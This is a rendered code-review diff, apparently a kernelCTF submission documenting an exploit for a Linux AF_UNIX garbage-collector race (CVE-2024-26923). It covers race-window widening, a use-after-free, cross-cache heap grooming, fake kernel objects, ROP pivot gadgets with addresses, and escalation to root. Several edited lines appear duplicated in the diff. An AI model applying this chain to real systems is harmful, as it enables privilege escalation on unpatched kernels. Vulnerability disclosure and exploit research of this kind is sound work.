google · lambdasprocket · Dec 19, 2025 · artmetla · Feb 25, 2026 · artmetla
diff --git a/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/exploit.md
@@ -0,0 +1,219 @@
+## Triggering the race condition
+
+In this vulnerability we have two race windows.
+The first one is in unix_stream_connect():
+
+```
+static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+                               int addr_len, int flags)
+{
+...
+
+        unix_peer(sk)   = newsk;
+
+[window 1 start]
+        unix_state_unlock(sk);
+
+        /* take ten and send info to listening sock */
+        spin_lock(&other->sk_receive_queue.lock);
+[window 1 end]
+
+        __skb_queue_tail(&other->sk_receive_queue, skb);
+        spin_unlock(&other->sk_receive_queue.lock);
+...
+```
+
+This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over.
-This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over.
+This function is triggered by executing connect on CPU 0. To win the race, the exploit intentionally stalls this thread right inside Window 1. This CPU will do nothing else until the race conditions part of the exploit is over, leaving the newly created "embryo" socket (newsk) allocated but not yet linked to the receive queue.
-This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over.
+This function is triggered by executing connect on CPU 0. To win the race, the exploit intentionally stalls this thread right inside Window 1. This CPU will do nothing else until the race conditions part of the exploit is over, leaving the newly created "embryo" socket (newsk) allocated but not yet linked to the receive queue.
+
+We have to use the other CPU available to perform 2 operations during this window:
-We have to use the other CPU available to perform 2 operations during this window:
+We have to use the other CPU available to perform 3 operations during this window:
-We have to use the other CPU available to perform 2 operations during this window:
+We have to use the other CPU available to perform 3 operations during this window:
+1. Send the victim socket through this connecting socket.
-1. Send the victim socket through this connecting socket.
+1. Send the victim socket through this connecting socket, using SCM_RIGHTS to make it an 'inflight' socket, which forces the garbage collector to track it.
+> Note: SCM_RIGHTS is a special message type that allows Unix sockets to send open file descriptors to each other. When a socket is sent this way but hasn't been read out of the queue yet, it is considered "inflight." The garbage collector specifically tracks inflight sockets to prevent cyclic memory leaks.
-1. Send the victim socket through this connecting socket.
+1. Send the victim socket through this connecting socket, using SCM_RIGHTS to make it an 'inflight' socket, which forces the garbage collector to track it.
+> Note: SCM_RIGHTS is a special message type that allows Unix sockets to send open file descriptors to each other. When a socket is sent this way but hasn't been read out of the queue yet, it is considered "inflight." The garbage collector specifically tracks inflight sockets to prevent cyclic memory leaks.
+2. Close the victim socket
-2. Close the victim socket
+2. Close the victim socket, so that its standard file reference count drops to zero, leaving only the garbage collector's internal references.
-2. Close the victim socket
+2. Close the victim socket, so that its standard file reference count drops to zero, leaving only the garbage collector's internal references.
+3. Trigger garbage collection and run unix_gc() until the start of window 2.
-3. Trigger garbage collection and run unix_gc() until the start of window 2.
+3. Trigger garbage collection and run `unix_gc()` until the start of window 2, by closing an unrelated socket, which forces `unix_gc()` to wake up and scan the inflight list.
-3. Trigger garbage collection and run unix_gc() until the start of window 2.
+3. Trigger garbage collection and run `unix_gc()` until the start of window 2, by closing an unrelated socket, which forces `unix_gc()` to wake up and scan the inflight list.
+
+If we start too early, our send will fail because the socket is not connected yet and the exploit will fail.
+
+Second window is in the unix_gc function:
+```
+void unix_gc(void)
+{
+...
+        list_for_each_entry(u, &gc_candidates, link)
+        {
+                scan_children(&u->sk, dec_inflight, NULL);
+        }
+
+[window 2 start]
+        /* Restore the references for children of all candidates,
+         * which have remaining references.  Do this recursively, so
+         * only those remain, which form cyclic references.
+         *
+         * Use a "cursor" link, to make the list traversal safe, even
+         * though elements might be moved about.
+         */
+        list_add(&cursor, &gc_candidates);
+[window 2 end]
+        while (cursor.next != &gc_candidates) {
+                u = list_entry(cursor.next, struct unix_sock, link);
+
+                /* Move cursor to after the current position. */
+                list_move(&cursor, &u->link);
+
+                if (atomic_long_read(&u->inflight) > 0) {
+                        list_move_tail(&u->link, &not_cycle_list);
+                        __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
+                        scan_children(&u->sk, inc_inflight_move_tail, NULL);
+                }
+        }
+        list_del(&cursor);
+
+
+```
+
+For the vulnerability to be triggered two conditions have to be met:
+1. The first scan_children() can not see the embryo in the receive queue of the server socket
+2. The second scan_children() has to see the embryo.
+
+This causes a decrement/increment mismatch and the resulting use-after-free.
-This causes a decrement/increment mismatch and the resulting use-after-free.
+This causes a decrement/increment mismatch and the resulting use-after-free. Because the garbage collector does not expect an embryo to be enqueued mid-scan, it misses the embryo during the first pass (failing to decrement the victim's `u->inflight` counter). When the stalled thread unfreezes, the embryo is enqueued. The GC sees it during the second pass and increments the victim's count. The victim's `unix_sock` reference count is now artificially, leaving a dangling pointer in the gc_inflight_list when the socket is closed.
-This causes a decrement/increment mismatch and the resulting use-after-free.
+This causes a decrement/increment mismatch and the resulting use-after-free. Because the garbage collector does not expect an embryo to be enqueued mid-scan, it misses the embryo during the first pass (failing to decrement the victim's `u->inflight` counter). When the stalled thread unfreezes, the embryo is enqueued. The GC sees it during the second pass and increments the victim's count. The victim's `unix_sock` reference count is now artificially, leaving a dangling pointer in the gc_inflight_list when the socket is closed.
+
+In other words, window 2 has run inside the window 1 of unix_stream_connect().
+
+
+To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible.
+To do that we use a well-known timerfd technique invented by Jann Horn.
+The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows)
+of epoll watches to this timerfd to make the time needed to handle the interrupt longer.
-of epoll watches to this timerfd to make the time needed to handle the interrupt longer.
+of epoll watches to this timerfd. When the timer fires, the kernel is forced to slowly iterate over hundreds of these watchers inside the interrupt handler, artificially stretching the race window from nanoseconds to milliseconds. 
-of epoll watches to this timerfd to make the time needed to handle the interrupt longer.
+of epoll watches to this timerfd. When the timer fires, the kernel is forced to slowly iterate over hundreds of these watchers inside the interrupt handler, artificially stretching the race window from nanoseconds to milliseconds. 
+For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).
+
+Here's the triggering sequence (we use 2 CPUs, CPU1 is executing child_send() thread):
+
+| CPU 0 | CPU 1 |
+| -------- | -------- |
+| arms timer 1 to trigger after a delay                         |  -                                                                    |
+| calls connect() on the client socket                          |  -                                                                    |
+| unix_stream_connect() runs until the start of window 1        |  -                                                                    |
+| timer 1 is triggered during window 1                          |  -                                                                    |
+| timer goes through all epoll notifications                    |  sends victim socket through the client socket                        |
+| ...                                                           |  closes victim socket                                                 |
+| ...                                                           |  arms timer 2 to trigger after a delay                                |
+| ...                                                           |  closes another socket to trigger unix_gc()                           |
+| ...                                                           |  unix_gc() runs until the start of window 2                           |
+| ...                                                           |  timer 2 is triggered during window 2                                 |
+| timer 1 handler ends                                          |  timer goes through all epoll notifications                           |
+| window 1 ends, embryo is added to the receive queue           |  ...                                                                  |
+| -                                                             |  timer 2 handler ends, window 2 ends                                  |
+| -                                                             |  second scan_children() executes inc_inflight_move_tail() on the victim socket |
+
+## Exploiting the use-after-free
+
+At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2.
-At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2.
+At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2 (stored inside the struct unix_sock).
-At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2.
+At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2 (stored inside the struct unix_sock).
+Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
-Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
+Next step is to receive this socket and close it. Receiving it drops the inflight count from 2 down to 1, and closing it drops its standard file descriptor reference count to 0. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
-Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
+Next step is to receive this socket and close it. Receiving it drops the inflight count from 2 down to 1, and closing it drops its standard file descriptor reference count to 0. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list.
+In case of unix sockets, struct sock is allocated from a separate kmalloc cached called 'UNIX'. On our target one slab takes a order 2 (size 0x4000) page and fits 15 objects.
+
+To be able to exploit the use-after-free we have to cause the slab containing our victim objects to be discarded and returned to the page allocator.
+This is done using standard cross-cache techniques:
+1. Free all objects of the given slab
+2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded
-2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded
+2. Create a lot of partial slabs to unfreeze the empty slab and force the kernel to flush it out and get it discarded.
-2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded
+2. Create a lot of partial slabs to unfreeze the empty slab and force the kernel to flush it out and get it discarded.
+
+However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit.
+
+Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
-Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
+Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt. By monitoring the raw page allocation counters in /proc/zoneinfo, we can observe exactly when the cache grabs a fresh page from the system.
-Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
+Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt. By monitoring the raw page allocation counters in /proc/zoneinfo, we can observe exactly when the cache grabs a fresh page from the system.
+This is done in the get_fresh_unix() function.
+One problem that we have to solve is that when a unix socket an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.
-One problem that we have to solve is that when a unix socket an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.
+One problem that we have to solve is that when a unix socket is allocated, an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.
-One problem that we have to solve is that when a unix socket an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.
+One problem that we have to solve is that when a unix socket is allocated, an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.
+
+To solve this we first allocate some netlinks objects, which do not have their own dedicated sock object cache, so the only order 2 page allocation comes from sock_inode_cache. 
+This allows us to get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab.
+
+After the slab page is returned to the page allocator we can easily reallocate it using an xattr of size 0x4000 - xattrs larger than 0x2000 are allocated directly from the page allocator.
+
+## Getting RIP control
+
+At this point we have a struct sock object linked in the gc_inflight_list that we can fill with arbitrary data.
+This list is used by unix_gc() and if we are able to craft a fake sock object convincing enough that unix_gc() will be able to traverse the gc_inflight_list and move sk_buff objects from our sock object to the 'hitlist' that will be passed to the skb_queue_purge().
+
+unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
-unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
+unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers. Because the kernel strictly verifies list integrity (e.g., node->next->prev == node), these pointers cannot be dummy values; they must be precisely calculated to interlock with the kernel's actual gc_inflight_list to avoid a panic.
-unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
+unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers. Because the kernel strictly verifies list integrity (e.g., node->next->prev == node), these pointers cannot be dummy values; they must be precisely calculated to interlock with the kernel's actual gc_inflight_list to avoid a panic.
+Also, properties such as sk_socket->file are accessed, meaning we have to also craft related objects (or at least their part) like struct socket, struct file, struct inode and finally sk_buff - this object will contain function pointer giving us RIP control and the ROP chain.
+
+But first, we need a place with a known address to store all these objects.
+
+### Crafting objects in kernel memory
+
+The fake kernel objects were sprayed into the physical memory by creating a lot of large tmpfs xattrs and referenced by using a direct mapping address - more details about that can be found in the [novel techniques](novel-techniques.md) section.
+
+The first fake socket to replace the victim object on the gc_inflight_list is prepared in prepare_sock() and has pointers to the ones prepared in prepare_more_socks(). These are actually allocated at the very beginning of the exploit - we can do it because their location in memory is known in advance.
+
+### Triggering the sk_buff destructor to get RIP control
+
+When an inflight socket is chosen to be released by the unix_gc() the sk_buff carrying it is removed from the sk_receive_queue and linked into the 'hitlist' and then skb_queue_purge() is called on that list:
+```
+static inline void __skb_queue_purge(struct sk_buff_head *list)
+{
+        struct sk_buff *skb;
+        while ((skb = __skb_dequeue(list)) != NULL)
+                kfree_skb(skb);
+}
+```
+
+If this is the last reference to a given skb, skb_release_head_state() is eventually called:
+```
+void skb_release_head_state(struct sk_buff *skb)
+{
+        skb_dst_drop(skb);
+        if (skb->destructor) {
+                DEBUG_NET_WARN_ON_ONCE(in_hardirq());
+                skb->destructor(skb);
+        }
+#if IS_ENABLED(CONFIG_NF_CONNTRACK)
+        nf_conntrack_put(skb_nfct(skb));
+#endif
+        skb_ext_put(skb);
+}
+```
+
+Because we control all the contents of the sk_buff object we can make sure the destructor will be called.
+
+## Pivot to ROP
+
+When the destructor is called, RDI contains a pointer to our fake sk_buff object.
+First 16 bytes of this objects are used the the list head, so we can't start our ROP there.
+
+Following chain of gadgets allows us to pivot to rdi+0x10 where our ROP chain starts:
+
+```
+mov    r8,QWORD PTR [rdi+0xc8]
+mov    eax,0x1
+test   r8,r8
+je     0xffffffff8218aac1
+mov    rsi,rdi
+mov    rcx,r14
+mov    rdi,rbp
+mov    rdx,r15
+call 0xffffffff8242ca60 <__x86_indirect_thunk_r8>
+```
+
+This copies RDI to RSI
+
+```
+push rsi
+jmp qword [rsi-0x70]
+```
+
+This pushes RSI to the stack. We can safely use -0x70 offset because our sk_buff is a part of a larger allocation
+
+Finally:
+
+```
+pop rsp
+pop rbp
+pop rbx
+ret
+```
+
+Two pops at the end move RSP after the list_head head of sk_buff
+
+## Second pivot
+
+There is not much space at the beginning of the sk_buff - next used field is at 0x38 offset, so we have space for only 3 gadgets, but this is enough to pivot to a larger space with a simple pop rsp ; ret
+
+## Privilege escalation
+
+The second stage of the ROP does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to the userspace.
diff --git a/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/novel-techniques.md
@@ -0,0 +1,13 @@
+### Storing objects under a known address in kernel memory
+
+There's a surprisingly simple way to store almost unlimited amount of data at a known kernel address, which makes tricks like using cpu_entry_area obsolete.
+
+All data stored in the memory is accessible in kernel mode via direct physical memory mapping.
+Virtual address of an object is the start of the direct mapping (page_offset_base) plus an offset based on the PFN of the physical page.
+Physical memory addresses of heap slabs or user memory are easily predicted - only kernel code/data sections are randomized. 
+Even if everything would be randomized, we could just spray most of the physical memory with our payload, defeating any such mitigation.
+
+page_offset_base is randomized, but on systems with the PTI disabled we can use a side channel technique like prefetch to leak this address, same way we do with the start of the kernel code section.
+
+There are many ways to store data in memory - I prefer using large xattrs on tmpfs. 
+The maximum size is of one xattr 0xffff bytes and allocations over 0x2000 are served directly from the page allocator.
diff --git a/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/docs/vulnerability.md
@@ -0,0 +1,84 @@
+## Requirements to trigger the vulnerability
+
+- Kernel configuration: CONFIG_UNIX
+- User namespaces required: no
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47d8ac011fe1c9251070e1bd64cb10b48193ec51
+
+## Affected kernel versions
+
+Introduced in 3.0. Fixed in 6.1.87, 6.6.28 and other stable trees.
+
+## Affected component, subsystem
+
+net/unix
+
+## Description
+
+Garbage collector does not take into account the risk of embryo getting
+enqueued during the garbage collection. If such embryo has a peer that
+carries SCM_RIGHTS, two consecutive passes of scan_children() may see a
+different set of children. Leading to an incorrectly elevated inflight
+count, and then a dangling pointer within the gc_inflight_list.
+
+sockets are AF_UNIX/SOCK_STREAM:
+- S is an unconnected socket
+- L is a listening in-flight socket bound to addr, not in fdtable
+- V's fd will be passed via sendmsg(), gets inflight count bumped
+
+```
+connect(S, addr)            sendmsg(S, [V]); close(V)           __unix_gc()
+----------------            -------------------------           -----------
+
+NS = unix_create1()
+skb1 = sock_wmalloc(NS)
+L = unix_find_other(addr)
+unix_state_lock(L)
+unix_peer(S) = NS
+
+
+                            // V count=1 inflight=0
+
+                            NS = unix_peer(S)
+                            skb2 = sock_alloc()
+                            skb_queue_tail(NS, skb2[V])
+
+                            // V became in-flight
+                            // V count=2 inflight=1
+
+                            close(V)
+
+                            // V count=1 inflight=1
+                            // GC candidate condition met
+
+                                                            for u in gc_inflight_list:
+                                                              if (total_refs == inflight_refs)
+                                                                add u to gc_candidates
+
+                                                            // gc_candidates={L, V}
+
+                                                            for u in gc_candidates:
+                                                              scan_children(u, dec_inflight)
+
+                                                            // embryo (skb1) was not
+                                                            // reachable from L yet, so V's
+                                                            // inflight remains unchanged
+
+
+__skb_queue_tail(L, skb1)
+unix_state_unlock(L)
+
+
+                                                            for u in gc_candidates:
+                                                              if (u.inflight)
+                                                                scan_children(u, inc_inflight_move_tail)
+
+                                                            // V count=1 inflight=2 (!)
+
+```
diff --git a/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/Makefile b/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/Makefile
@@ -0,0 +1,9 @@
+INCLUDES =
+LIBS = -pthread -ldl
+CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
+
+exploit: exploit.c kernelver_17800.147.54.h
+	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+
+prerequisites:
+	sudo apt-get install libkeyutils-dev
diff --git a/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/exploit b/pocs/linux/kernelctf/CVE-2024-26923_lts_cos/exploit/cos-109-17800.147.54/exploit